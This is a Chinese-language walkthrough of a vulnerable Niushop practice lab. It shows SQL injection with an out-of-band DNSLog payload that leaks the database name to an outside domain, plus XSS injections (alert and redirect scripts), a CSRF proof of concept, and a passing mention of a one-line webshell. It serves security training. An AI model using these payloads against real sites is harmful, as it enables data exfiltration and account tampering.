Niushop-master靶场漏洞
靶场搭建
将 niushop-master.zip 压缩包放到网站的根目录,解压后访问
浏览器访问 install.php ,根据提示安装即可
1.SQL注入漏洞
随便选择一种商品分类,发现有参数,测试注入
测试闭合发现页面报错有sql注入
应该是环境的问题,但是这不影响我们判断存在sql注入
该网站还有一处sql注入漏洞,我们可以进入后台系统--设置--数据库管理--SQL执行与导入
输入查询语句,点击执行,成功执行,但是我们得不到具体信息,这时需要利用外带注入方法
外带原理:将dnslog平台中的特有字段payload带⼊⽬标发起dns请求,通过dns解析将请求后的关键信息组合新的三级域名带出,在dns服务器的dns⽇志中显示出来 DNSLog Platform
select load_file(concat('\\\\',(select database()),'.95xpzc.dnslog.cn\\abc'))
文件上传漏洞
1.首先写一个一句话木马
XSS漏洞
反射型xss漏洞
登录后台系统--设置--基础设置--商城第三方统计代码
在输入框中输入js弹窗代码,然后点击提交
<script>alert(1)</script>
返回前端页面,刷新,出现弹窗
后台系统还有一处反射型xss漏洞,点击网站--广告位--添加广告
<script>alert(1)</script>
返回前端刷新,点击该广告,页面会出现弹窗
存储型xss漏洞
后台系统还有一处,点击网站--广告位--添加广告
这里的 '链接地址' 可以尝试xss
在自己网站的根目录新建一个 2.html 文件,内容如下
<script>document.location="http://www.baidu.com"</script>
链接地址修改为www下的 2.html
返回前端,刷新页面,点击此广告,页面就会跳转到设置的界面
CSRF漏洞
注册一个普通用户,登录以后修改基本信息
使用bp抓取提交信息的请求包,鼠标右键--相关工具--生成CSRF-Poc--复制HTML
将复制的内容放到自己本地网站的根目录,浏览器访问
点击按钮,就会发现用户信息被修改,说明存在CSRF漏洞